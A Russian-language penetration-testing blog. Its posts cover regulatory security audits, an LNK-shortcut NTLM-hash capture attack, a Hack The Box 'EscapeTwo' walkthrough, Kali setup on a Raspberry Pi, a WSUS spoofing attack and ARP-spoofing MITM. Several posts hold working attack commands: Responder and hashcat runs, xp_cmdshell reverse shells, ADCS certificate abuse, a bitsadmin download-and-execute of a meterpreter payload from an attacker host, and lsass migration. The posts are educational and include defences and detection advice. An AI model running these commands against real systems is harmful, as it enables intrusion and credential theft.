Black_Maus

Проверка контролирующих органов по ИБ

2025-06-26T14:36:57.088Z

Проверка - какая она? Многие задаются вопросом о том, что из себя представляет проверка контролирующих органов по информационной безопасности. Некоторые думают, что это очередная "палка" для органа, другие думают что посмотрят только документы и всё. На самом деле такие проверки являются комплексными и несут в себе полный аудит всей организации. Многие боятся таких проверок и очень зря, ведь некоторые компании готовы за такие проверки выложить круглую сумму.

Стоит понимать, что после проверок именно органами тоже есть плата, однако она эфемерная, и финансы будут потрачены исключительно на повышение уровня информационной безопасности, так как орган после проверки дает рекомендации к устранению со сроками.

Итак, что же это за проверки такие? Ответ на самом деле очень прост, в первую очередь идет проверка разработанных документов в организации, касаемые информационной безопасности. Все эти 187-ФЗ, 152-ФЗ, Указ Президента 250, ФСБ, ФСТЭК и т.д.

Далее идет проверка внутреннего нарушителя или по-другому внутренний пентест. На этом этапе происходит попытка захвата Active Directory, в также различных информационных систем, которые имеют для организации значимость. Например, Kaspersky Security Center, SIEM, ядро сети, происходит попытка получения администраторского доступа к различным информационным системам персональных данных, даже если они не принадлежат организации. Тут же происходит сканирование всех хостов в помощью MaxPatrol.

Затем происходит тестирование внешних ресурсов на предмет проникновения в локальную сеть организации. На этом этапе как раз используются все возможности веб-пентеста, различные Nuclei, Acunetix, а также использование всех возможностей BurpSuite.

Далее, происходит проверка хостов на предмет исполнения организацией своих собственных разработанных документов по ИБ. В основном тут идет обход нескольких компьютеров с целью определить, как работают пользователи, имеются ли антивирусы, их настройки, не хранятся ли пароли в открытом виде на рабочем столе.

И в конце, происходит замер сигналов Wi-Fi на территории организации с целью найти нелегитимные точки доступа а также попытка перехвата хендшейка. В целом на этом этапе нет каких-то требований, но наличие точки доступа в сеть организации может стать уязвимой точкой входа для различных злоумышленников.

Вот и все основные этапы проведения проверки. По итогу мероприятий выдается документ с описанием рекомендаций, которые необходимо будет исполнить.

Атака через LNK-файл

2025-03-09T19:58:17.172Z

❗ Данный материал предоставлен исключительно в образовательных целях. Использование этих техник в незаконных целях является нарушением закона!

Атака с использованием LNK-файла (ярлыка Windows) задействует вредоносные ярлыки Windows для выполнения команд, доставки полезной нагрузки или захвата учетных данных жертвы. Когда жертва открывает LNK-файл, он может автоматически инициировать подключение к серверу атакующего или выполнить опасный код.

---

Этапы атаки через LNK-файл

Шаг 1: Создание вредоносного LNK-файла
Злоумышленник создаёт LNK-файл, который ссылается на сетевой ресурс, находящийся под его контролем. Этот файл может скрывать вызов SMB- или WebDAV-запроса, что позволяет атакующему перехватить хэши учетных данных жертвы.

$objShell = New-Object -ComObject WScript.shell
$lnk = $objShell.CreateShortcut("C:\test.lnk")
$lnk.TargetPath = "\\192.168.92.132\~test.png" # Указание на сетевой ресурс злоумышленника
$lnk.WindowStyle = 1 # Установка обычного стиля окна
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3" # Назначение значка ярлыка
$lnk.Description = "Test" # Описательный текст для сочетания клавиш
$lnk.HotKey = "Ctrl+Alt+T" # Установка хоткея для сочетания клавиш
$lnk.Save() # Сохранение LNK-файла

- New-Object -ComObject WScript.shell — создаёт объект для взаимодействия с Windows Shell.
- CreateShortcut("C:\test.lnk") — создаёт LNK-файл по указанному пути.
- TargetPath = "\\192.168.92.132\~test.png" — указывает путь к сетевому ресурсу атакующего.

Другие параметры, такие как WindowStyle, IconLocation и HotKey, являются косметическими настройками, которые делают ярлык похожим на легитимный.

Шаг 2: Проверка существования вредоносного файла

После создания LNK-файла перейдите в папку, где он был создан. На машине атакующего с Kali проверьте папку HYDRA-DC.

Затем откройте папку hackme, чтобы убедиться, что файл ~test.png существует. Этот файл будет передан жертве при открытии LNK-файла. Как жертва взаимодействует с файлом **~test.

Шаг 3: Запуск Responder для перехвата хэшей

Responder — это инструмент, который перехватывает NTLM-хэши учетных записей, когда жертва пытается аутентифицироваться через SMB или WebDAV.

Запуск Responder на Kali:

sudo responder -I eth0 -dp
- `-I eth0` — указывает сетевой интерфейс для прослушивания.
- `-dp` — активирует перехват SMB- и DNS-запросов.

Когда жертва открывает вредоносный LNK-файл, система автоматически отправляет SMB-запрос, и **Responder** перехватывает NTLM-хэш учетных данных.

Более детализированный режим работы:

sudo responder -I eth0 -dpV

- `-V` — активирует подробный вывод захваченных данных.

Шаг 4: Анализ перехваченных хэшей

Проверяя вывод Responder, атакующий может увидеть захваченные NTLM-хэши и использовать их для последующего взлома пароля с помощью таких инструментов, как Hashcat или **John the Ripper.

Пример атаки на хэши с помощью Hashcat:

hashcat -m 5600 captured_hashes.txt rockyou.txt --force

- `-m 5600` — указывает NTLMv2-хэши.
- `rockyou.txt` — словарь паролей.

Шаг 5: Использование NetExec для выполнения команд

NetExec — инструмент, аналогичный CrackMapExec, который позволяет атакующему удалённо выполнять команды на машине жертвы.

Пример выполнения команды через NetExec:

netexec smb 192.168.92.128 -d marvel.local -u fcastle -p Password1 -M slinky -o NAME=test SERVER=192.168.92.129

- `192.168.92.128` — IP-адрес жертвы.
- `-d marvel.local` — домен цели.
- `-u fcastle -p Password1` — учетные данные.
- `-M slinky` — указывает вредоносный модуль.
- `-o NAME=test SERVER=192.168.92.129` — передача параметров в модуль **slinky**.

Если команда выполнена успешно, атакующий может продолжить эксплуатацию системы жертвы или выполнить эксфильтрацию данных.

Вывод

Атака через LNK-файл — эффективный метод компрометации системы, который часто используется для:
✅ Захвата NTLM-хэшей учетных данных.
✅ Доставки вредоносного кода.
✅ Удалённого выполнения команд на машине жертвы.

⚠️ Меры защиты:
- Отключение SMBv1 и ограничение аутентификации по NTLM.
- Предотвращение автоматического открытия ярлыков из ненадежных источников.
- Использование сетевых фильтров и мониторинг подозрительных активностей.
- Жёсткое администрирование групповых политик (GPO) для блокировки выполнения неизвестных ярлыков.

EscapeTwo

2025-01-16T15:33:00.823Z

В текущей задаче нам уже дают креды rose/KxEPkKe6R8su
Но мы все равно запускаем nmap
Для начала добавляем в hosts

echo '10.10.11.51 escapetwo.htb' | sudo tee -a /etc/hosts

┌─[maus@parrot]─[~]
└──╼ $nmap -sC -sV -Pn 10.10.11.51
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-16 01:07 EST
Nmap scan report for EscapeTwo.htb (10.10.11.51)
Host is up (0.11s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-01-16 06:07:40Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-16T06:09:01+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-16T06:09:01+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info: 
|   10.10.11.51:1433: 
|     Target_Name: SEQUEL
|     NetBIOS_Domain_Name: SEQUEL
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: sequel.htb
|     DNS_Computer_Name: DC01.sequel.htb
|     DNS_Tree_Name: sequel.htb
|_    Product_Version: 10.0.17763
| ms-sql-info: 
|   10.10.11.51:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_ssl-date: 2025-01-16T06:09:01+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-01-16T04:02:53
|_Not valid after:  2055-01-16T04:02:53
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
|_ssl-date: 2025-01-16T06:09:01+00:00; 0s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-16T06:09:01+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-01-16T06:08:24
|_  start_date: N/A

В выводе nmap мы видим, что есть домен sequel.htb и контроллер домена DC01.sequel.htb
На всякий случай прописываем и их в hosts

echo '10.10.11.51 'DC01.sequel.htb' | sudo tee -a /etc/hosts && echo 'sequel.htb' | sudo tee -a /etc/hosts

В выводе nmap также видим, что открыт 445 порт, а значит можно попробовать smbmap

Ага, удачная аутентификация, а значит можно подключаться через smbclient

Изучаем доступные каталоги и видим, что в каталоге Accounting Department имеются файлы, которые потенциально интересны. Скачиваем их через get

Если мы попытаемся их открыть, то особо ничего не получится (по крайней мере у меня не вышло), но мы знаем что расширение xlsx это по сути архив, поэтому смело распаковываем через unzip

Нам распакуется файл sharedStrings.xml в которой будут логины и пароли с SQL, а также админ SQL

Получаем пароль и подключаемся

После того как подключились, нужно прокинуть шелл для простоты работы

Включаем для начала enable_xp_cmdshell и выбираем powershell в base64, шелл можно сделать на сайте revshells.com. Не забываем у себя открыть nc -nlvp 3344

Итак, после появления шелла изучаем систему. Видим, что в пользователях есть некий ryan ~~Гослинг~~

Смотрим дальше, нам нужно что-то, что даст нам хотя бы намеки на другие креды.
На диске C видим интересную папку SQL2019, а внутри файл конфигурации и кредами в открытом виде.

Мы же помним, что нашли какого-то Райана, а тут и пароль какой-то интересный. Проверяем в netexec на валидность

Опа, вот это поворот. Не теряя времени подключаемся evil-winrm

Лутаем флаг юзера, и переходим к руту.

Проверяем сетевые конфиги

Добавляем в hosts Sequel.htb и dc01.seqeul.htb

Так как это DC, попробуем проанализировать его через bloodhound

bloodhound-python -u ryan -p "WqSZAFXXXXXXXX" -d sequel.htb -ns 10.10.xx.xx -c All
INFO: Found AD domain: sequel.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc01.sequel.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.sequel.htb
INFO: Found 10 users
INFO: Found 59 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.sequel.htb
INFO: Done in 00M 16S

Видим, что у Райана есть разрешение WriteOwner на CA_SVC, а это эмитент сертификата. Значит мы можем назначить Райана владельцем SA_SVC

Устанавливаем владельца

bloodyAD --host 10.10.11.51 -d sequel.htb -u ryan -p WqSZAF6CysDQbGb3 set owner ca_svc ryan

Получаем права управления

dacledit.py -action 'write' -rights 'FullControl' -principal 'ryan' -target 'ca_svc' '10.10.11.51'/'ryan':'WqSZAF6CysDQbGb3'

Получаем shadow креды и NTHash

certipy shadow auto -u ryan@sequel.htb -p 'WqSZAF6CysDQbGb3' -dc-ip 10.10.11.51 -ns 10.10.11.51 -target 10.10.11.51 -account ca_svc

Если возникает ошибка, установите время как на сервере через ntpdate

Через Certyfi нужно узнать имя объекта

*Evil-WinRM* PS C:\temp> ./Certify.exe find /domain:sequel.htb

**ИЛИ**

KRB5CCNAME=$PWD/ca_svc.ccache certipy find -scheme ldap -k -debug -target DC01.sequel.htb -dc-ip 10.10.11.51 -vulnerable -stdout

Такой же результат будет.
Видим, что ca_svc имеет переопределяемые разрешения для этого сертификата, делаем это

KRB5CCNAME=$PWD/ca_svc.ccache certipy template -k -template DunderMifflinAuthentication -target DC01.sequel.htb -dc-ip 10.10.11.51

Используем ca_svc хеш учетных данных пользователя для получения билета аутентификации целевой системы через запрос Kerberos

certipy req -u ca_svc -hashes :3b181b914e7a9d5508ea1e20bc2b7fce -ca sequel-DC01-CA -target DC01.sequel.htb -dc-ip 10.10.11.51 -template DunderMifflinAuthentication -upn Administrator@sequel.htb -ns 10.10.11.51 -dns 10.10.11.51

Тут могут быть проблемы с самой машиной, так что нужно пытаться несколько раз, и ребутать машину. Ошибка будет что сертификат .pfx генерироваться не будет, только .key, а он нам не нужен.

Получаем хэш администратора через сертификат

certipy auth -pfx administrator_10.pfx  -domain sequel.htb

Получаем хеш, подключаемся через evil-winrm и лутаем root флаг, мы молодцы.

Установка Kali Linux на Raspberry Pi 4B и Alfa Networks

2024-11-13T07:20:55.297Z

Всем привет! Недавно на одном из кейсов по red team попала мне в руки малинка с фирменными клавиатурой, мышкой и альфой. По удобству работы на клавиатуре скажу, что мне не понравилось. Мой топ это клавы от thinkpad'ов.

На флешке была предустановленная Raspberry Pi OS. Было решено менять систему на kali, ввиду большего инструментария для проведения мероприятий.

Итак, краткая инструкция по тому, как переустановить систему для Raspberry Pi 4B

Для начала вам понадобится:

Raspberry Pi 4
Клавиатура + мышь
Флешка минимум на 16 ГБ
Монитор
Ноутбук/ПК

Итак, на ноуте скачиваем Etcher и Kali для Raspberry

У меня была флешка microsd на 32 ГБ, на которую я установил Kali

Запускаем Etcher, выбираем flash from file, выбираем флешку, нажимаем flash и ждем

Можно прошить и другим ПО, типа dd

После прошивки включаем монитор, клавиатуру, мышь. В моем случае я ещё подключил ethernet

Далее необходимо прописать в /etc/network/interfaces:

allow-hotplug eth0
iface eth0 inet static
address 192.168.170.187 #указываете ip-адрес из своей подсети и далее соотв
netmask 255.255.255.0
network 192.168.170.0
broadcast 192.168.170.255
gateway 192.168.170.250
dns-nameservers 8.8.8.8

Если у вас в сети есть dhcp, то можно просто прописать в терминале

dhclient

и все заработает до перезагрузки

После настройки сетевых интерфейсов необходимо обновить репозитории и пакеты

sudo apt update
sudo apt upgrade

Официальная документация от Kali для raspberry

Далее устанавливаем драйвера для альфы.

Важно! В процессе установки драйверов альфа должна быть отключена от raspberry

Установка довольна простая, копируем драйвера с git

git clone -b v5.6.4.2 https://github.com/aircrack-ng/rtl8812au.git

устанавливаем драйвера через make

make && make install

или можно использовать dkms

sudo make dkms_install

Альфу я включал в usb 3.0, который по дефлоту не определяется альфой. Чтобы альфа могла работать по usb 3.0 для этого нужно прописать

rmmod 88XXau
modprobe 88XXau rtw_switch_usb_mode=1

Итак, теперь когда у нас все работает, идем ломать точки доступа :)

Атака на локальный сервер обновлений Windows (WSUS)

2024-10-03T07:16:58.147Z

По умолчанию при развёртывании службы обновлений Windows Server (WSUS) настройка SSL сертификатов не требуется, трафик передается в открытом виде по HTTP протоколу.

Данная конфигурация службы обновлений является уязвимой и может быть проэксплуатирована атакующим при помощи MitM-атаки: незащищенный трафик, идущий на легитимный сервер обновлений, перенаправляется на поддельный, что дает атакующему возможность внедрять произвольные метаданные обновлений (например подделывать ответы на SOAP запросы «SyncUpdates (software)» (данный запрос позволяет выполнить проверку наличия неустановленных обновлений ПО) и «GetExtendedUpdateInfo» (запрашивает метаданные обновления у WSUS, в числе которых URL ссылка на файл с обновлением)).

Последовательность атаки на WSUS:

Атакующий осуществляет MitM атаку;
Клиент, ОС Windows, отправляет запрос на обновление системы на WSUS;
Атакующий подделывает ответ на запрос обновления. В ответе на запрос GetExtendedUpdateInfo, атакующий указывает файл, который будет загружен и выполнен. Поскольку на клиенте будут выполняться только исполняемые файлы с действительной подписью Microsoft, целесообразно использовать одну из утилит sysinternals, обладающих такой подписью. Также утилита должна иметь возможность выполнения команд, в связи с чем предлагается использовать PsExec.

Метаданные для пакета обновления содержат тег «InstallCommand», который используется для передачи дополнительных параметров при установке файла обновления. Эти параметры не проверяются на целостность, поэтому их можно изменить, получая возможность выполнять команды с правами привилегированной учетной записи «NT AUTHORITY\SYSTEM»:

Реализация атаки

Первым шагом проведения атаки – является MitM атака, в ходе которой запрос на обновление будет перенаправлен на WSUS атакующего. Осуществить данную атаку можно при помощи инструмента bettercap, используя встроенный механизм проксирования трафика:

sudo bettercap -iface eth0

Для активации ARP spoofing атаки и перенаправления трафика необходимо использовать следующие настройки:

set arp.spoof.targets 10.10.10.50
set arp.spoof.internal true
set any.proxy.iface eth0
set any.proxy.protocol TCP
set any.proxy.src_address $WSUS_IP
set any.proxy.src_port 8530
set any.proxy.dst_address 10.10.10.25
set any.proxy.dst_port 8530
any.proxy on
arp.spoof on

- arp.spoof.targets - определяет машину, ARP таблица которой будет отравлена;

- arp.spoof.internal true - указывает на необходимость осуществления атаки на машины в локальной сети (по умолчанию атака осуществляется на шлюз);

- any.proxy - определяют сетевой трафик, который будет перенаправлен: в данном случае весь TCP трафик идущий на $WSUS_IP:8530 будет перенаправлен на машину атакующего 10.10.10.25:8530;

- any.proxy on - запускает перенаправление трафика;

- arp.spoof on - запускает ARP spoofing атаку.

Вторым шагом будет использование инструмента pywsus.py для развёртывания поддельного сервера обновлений и дальнейшей атаки:

python3 pywsus.py --host 10.10.10.25 --port 8530 --executable /path/to/PsExec64.exe --command '/accepteula /s cmd.exe /c "some command"'

- --host (-H) – IP адрес атакующего;

- --port (-p) – порт, на котором будет запущен поддельный WSUS;

- --executable (-e) указывает на утилиту, обладающую подписью Microsoft, и возможностью исполнения команд;

- --command – команда которая будет помещена в аргумент InstallCommand.

В качестве команды может быть загрузка и выполнение файла для получения удаленной оболочки:

bitsadmin /transfer mydownloadjob /download /priority FOREGROUND "http://10.10.10.25:8080/reverse.exe" "%TEMP%\reverse.exe" && %TEMP%\reverse.exe

Помимо утилиты bitsadmin для загрузки файлов можно использовать другие исполняемые файлы, полный перечень которых можно найти в списке lolbins.
Для создания полезной нагрузки (файла reverse.exe) можно воспользоваться утилитой msfvenom, для этого выполним команду:

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.10.25 LPORT=6666 -f exe -o reverse.exe

Для доставки файла запустим http-сервер:

python3 -m http.server 8080

Если атакующий обладает доступом к непривилегированной учетной записи, он может инициировать проверку обновления вручную, что позволит выполнить команды с повышенными привилегиями (от имени учетной записи «NT AUTHORITY\SYSTEM»), тем самым достигая локального повышения привилегий (Local Privilege Escalation, LPE) (из графического интерфейса «Проверить наличие обновлений», из консоли командой usoclient.exe startscan). Также существует реализация данной атаки с локальным поддельным WSUS WSuspicious.

Тем временем следует запустить listener и дождаться получения meterpreter сессии:

msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter_reverse_tcp; set lhost 10.10.10.25; set lport 6666; exploit"

Была получена meterpreter сессия от пользователя «NT AUTHORITY\SYSTEM» с рабочей станции USER-PC2.
Для практического выполнения следующих разделов можно открыть meterpreter сессию вручную, для этого выполните шаги по созданию и доставке reverse.exe (а также запуску listener), выполните команду для загрузки и выполнения файла для получения удаленной оболочки (bitsadmin …) от имени пользователя PcAdmin (пароль qwe123!@#) на рабочей станции USER-PC2 (запустив cmd с правами администратора).

bitsadmin /transfer mydownloadjob /download /priority FOREGROUND "http://10.10.10.25:8080/reverse.exe" "%TEMP%\reverse.exe" && %TEMP%\reverse.exe

Так как пользователь PcAdmin входит в группу локальных администраторов USER-PC2, при помощи модуля getsystem можно получить системные привилегии. Далее необходимо выполнить миграцию на системный процесс, например lsass.exe:

migrate -N lsass.exe

Man-In-The-Middle (MITM)

2024-08-12T09:00:27.966Z

Принцип атак MITM заключается в том, что атакующий внедряется в сетевое взаимодействие и выступает в качестве посредника между атакуемыми узлами, ретранслируя их сообщения. Осуществить подобную атаку в локальной сети в частности можно при помощи техники ARP-spoofing.

ARP (Address Resolution Protocol – протокол определения адреса) – протокол в компьютерных сетях, предназначенный для определения MAC адреса компьютера по известному IP-адресу. Данный протокол используется во время сетевого взаимодействия для отображения IP-адреса на MAC-адрес во время подготовки и отправки кадров протокола канального уровня (на канальном уровне адресация происходит по MAC-адресам). Существуют следующие типы ARP-сообщений: ARP запрос (ARP request) и ARP ответ (ARP reply).
Для того чтобы отправить сетевой пакет системе необходимо знать MAC-адрес получателя (для инкапсуляции сетевого пакета (дейтаграммы) в кадр канального уровня), для этого первым шагом система проверяет локальную ARP таблицу (представлена на рисунке ниже), если записи с IP-адресом в ARP таблице нет, ARP протокол выполняет следующие действия:

Выполняется широковещательный ARP запрос, содержащий IP-адрес получателя
Узел, имеющий требуемый IP-адрес (указан в ARP запросе), отправляет ARP ответ, содержащий его MAC-адрес;
Данный ответ обрабатывается инициатором запроса, соответствующая запись добавляется в ARP таблицу;
Выполняется успешное отображение IP-адреса в MAC-адрес.

Особенностью работы ARP протокола является возможность обновления ARP таблицы без отправки ARP запроса, т.е. любой узел в локальной сети, получающий широковещательный ARP запрос, может обновить информацию об отправителе данного ARP запроса (изменить соответствие IP-адреса MAC-адресу в ARP таблице) (при условии, что ARP запись не является статичной).

Для оповещения узлов в сети об появлении нового узла (или при изменении сетевых настроек существующих узлов) применяется специальный Gratuitous ARP запрос. Данный ARP запрос запрашивает MAC-адрес собственного узла, т.е. посылает широковещательный ARP запрос, содержащий собственный IP-адрес (данный запрос остается без ответа, если в сети нет дублирующего IP-адреса).

Проверить записи в ARP таблице можно командой:

arp -a

Проверка таблицы ARP

Принцип атаки ARP-spoofing заключается в модификации локальной ARP таблицы машин таким образом, что MAC-адрес легитимного устройства в сети заменяется MAC-адресом атакующего. Это осуществляется за счет непрерывной отправки большого количества Gratuitous ARP запросов, которые атакуемый хост обрабатывает и использует для обновления информации об отправителе в локальной ARP таблице (атака осуществляется непрерывно, т.к. легитимные узлы могут восстановить ARP запись, отправив ARP пакет). Данная атака возможна из-за отсутствия механизма аутентификации для проверки сообщений в ARP протоколе, т.е. любой узел в сети может ответить на широковещательный ARP запрос (или отправить Gratuitous ARP).
Данная атака позволяет атакующему прослушивать, модифицировать, или перенаправлять сетевой трафик с атакуемых узлов. Осуществить атаку можно при помощи следующих инструментов:

Ettercap: Это один из наиболее известных инструментов для проведения MITM атак, включая ARP-spуфинг. Ettercap поддерживает перехват и фильтрацию сетевого трафика, а также предоставляет графический интерфейс для удобства использования.
Bettercap: Современный инструмент, который поддерживает различные виды MITM атак, включая ARP-spуфинг. Bettercap отличается своей гибкостью и удобством в настройке, а также имеет активную поддержку и частые обновления.
Arpspoof: Это простой, но эффективный инструмент для ARP-spуфинга, который является частью пакета dsniff. Arpspoof позволяет легко перенаправлять трафик через машину атакующего, что делает его отличным выбором для тех, кто только начинает изучать эту технику.
MITMf (Man-In-The-Middle-Framework): Комплексный фреймворк, включающий в себя инструменты для различных атак типа MITM, включая ARP-spуфинг. MITMf объединяет возможности нескольких инструментов и предоставляет мощный набор для проведения сетевых атак.

Реализация атаки

Рассмотрим реализацию атаки arp-spoofing с помощью инструмента bettercap:

sudo bettercap -iface eth0

Запуск bettercap

Используем следующие настройки:

set arp.spoof.targets 192.168.150.233
set arp.spoof.internal true
arp.spoof on

Параметр arp.spoof.target устанавливает машину, ARP таблица которой будет отравлена (по умолчанию атака осуществляется на все машины в сети), arp.spoof.internal true указывает на необходимость осуществления атаки на машины в локальной сети (по умолчанию атака осуществляется на шлюз), "arp.spoof on запускает ARP spoofing атаку.

После запуска ARP spoofing, атакующий может просматривать трафик атакуемых узлов (т.к. весь трафик будет проходить через машину атакующего) при помощи программ для анализа сетевого трафика (например, при помощи Wireshark).

Обнаружение

Активный ARP-spoofing можно обнаружить несколькими способами:

Просмотр ARP-таблицы.

Выделен IP-адрес атакующей машины

Изменение времени жизни (TTL) ping пакета (некоторые инструменты могут модифицировать TTL).

При прохождении трафика через узел атакующего, TTL пакета уменьшается.

Просмотр сетевого трафика при помощи программы для анализа сетевого трафика

В данном случае хост получает большое количество Gratuitous ARP запросов от одного источника, что является аномалией сетевого трафика и может свидетельствовать об ARP spoofing атаке.

Black_Maus

Проверка контролирующих органов по ИБ

Атака через LNK-файл

Этапы атаки через LNK-файл

Шаг 2: Проверка существования вредоносного файла

Шаг 3: Запуск Responder для перехвата хэшей

Шаг 5: Использование NetExec для выполнения команд

Вывод

EscapeTwo

Установка Kali Linux на Raspberry Pi 4B и Alfa Networks

Атака на локальный сервер обновлений Windows (WSUS)

Реализация атаки

Рекомендации

Man-In-The-Middle (MITM)

Реализация атаки

Обнаружение

Рекомендации